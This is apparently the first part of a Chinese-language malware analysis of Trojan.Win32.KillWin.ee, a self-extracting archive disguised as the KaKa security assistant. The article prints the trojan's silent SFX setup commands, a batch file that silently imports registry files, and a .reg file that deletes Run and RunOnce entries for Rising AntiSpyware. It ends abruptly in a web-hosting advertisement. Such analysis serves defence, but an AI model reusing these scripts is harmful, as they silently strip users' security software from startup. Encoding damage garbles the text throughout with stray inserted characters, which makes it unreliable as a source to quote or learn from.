對(duì)清除Trojan.Win32.KillWin.ee病毒的方案分析(1)

而安全軟件在此時(shí)卻顯得力不從心，因?yàn)楹芏嗖《灸抉R在發(fā)作前都開(kāi)始解除安軟的保護(hù)功能，這不新出現(xiàn)的Trojan.Win32.KillWin.ee也具備此種功能。

病毒日新月異的今天，越來(lái)越多的偽裝及新型變種是一天接一天的瘋狂，面對(duì)如此情況，很多網(wǎng)民是只能一次又一次的進(jìn)行系統(tǒng)還原或者是重裝系統(tǒng)。而安全軟件在此時(shí)卻顯得力不從心，因?yàn)楹芏嗖《灸抉R在發(fā)作前都開(kāi)始解除安軟的保護(hù)功能，這不新出現(xiàn)的Trojan.Win32.KillWin.ee也具備此種功能。

病毒分析

該病毒名為T(mén)rojan.Win32.KillWin.ee，文件雖然只有小小的169 KB(173,614 字節(jié))，但其威力卻不容小視。病毒為WINRAR自解壓縮包格式，可通過(guò)修改自身圖標(biāo)為卡卡助手的標(biāo)識(shí)來(lái)進(jìn)行偽裝自身。

當(dāng)Trojan.Win32.KillWin.ee病毒進(jìn)駐到用戶(hù)計(jì)算機(jī)后，會(huì)釋放BAT和REG命令的執(zhí)行文件，并利用命令方式刪除用戶(hù)計(jì)算機(jī)中的卡卡助手啟動(dòng)項(xiàng)，禁止其真實(shí)的程序啟動(dòng)，然后通過(guò)劫持卡卡的主程序并將其指向病毒主體gameover.exe程序。

該程序在使用自動(dòng)解壓縮命令解壓自身后開(kāi)始進(jìn)行系統(tǒng)破壞，其自解壓命令如下：

Path=%SystemRoot%\system32\

SavePath

Setup=hidecmd.exe kv.bat

Silent=1

Overwrite=1

執(zhí)行hidecmd.exe(隱藏執(zhí)行BAT)用參數(shù)調(diào)用kv.bat隱藏執(zhí)行。

kv.bat的內(nèi)容為：

@echo off

%SystemRoot%\regedit /s kaka.reg

%SystemRoot%\regedit /s gameover.reg

Exit

病毒修改注冊(cè)表

在結(jié)束上述命令后，Trojan.Win32.KillWin.ee病毒源體開(kāi)始接著導(dǎo)入到系統(tǒng)中兩個(gè)REG文件，來(lái)修改注冊(cè)表，其內(nèi)容如下：

kaka.reg：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"

病毒刪除卡卡助手

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]